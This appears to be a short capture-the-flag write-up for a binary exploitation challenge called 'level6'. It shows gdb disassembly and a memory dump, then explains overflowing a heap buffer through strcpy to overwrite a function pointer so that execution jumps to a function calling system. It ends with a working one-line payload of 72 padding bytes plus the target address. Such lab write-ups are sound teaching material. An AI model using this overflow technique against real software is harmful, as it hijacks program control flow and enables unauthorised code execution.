The <n> function makes a call to system but is never executed

$ (gdb) disas n
...
0x08048461 <+13>:	call   0x8048370 <system@plt>
...

The idea is to overwrite the EIP of the <main> function to jump to <n> instead

$ (gdb) disas main
...
0x080484c5 <+73>:	call   0x8048340 <strcpy@plt>
...
(gdb) c
Continuing.
0x804a000:	0x00000000	0x00000049	0x41414141	0x41414141
0x804a010:	0x41414141	0x41414141	0x41414141	0x41414141
0x804a020:	0x41414141	0x41414141	0x41414141	0x41414141
0x804a030:	0x41414141	0x41414141	0x41414141	0x41414141
0x804a040:	0x41414141	0x41414141	0x41414141	0x00000000
0x804a050:    ->0x08048468<-    0x00000000	0x00000000	0x00020fa9
0x804a060:	0x00000000	0x00000000	0x00000000	0x00000000

just need to replace 0x08048468 by 08048454 <n>:

We can use strcpy to overflow the buffer.

$ ./level6 $(python -c "print('A' * 72 + '\x54\x84\x04\x08')")
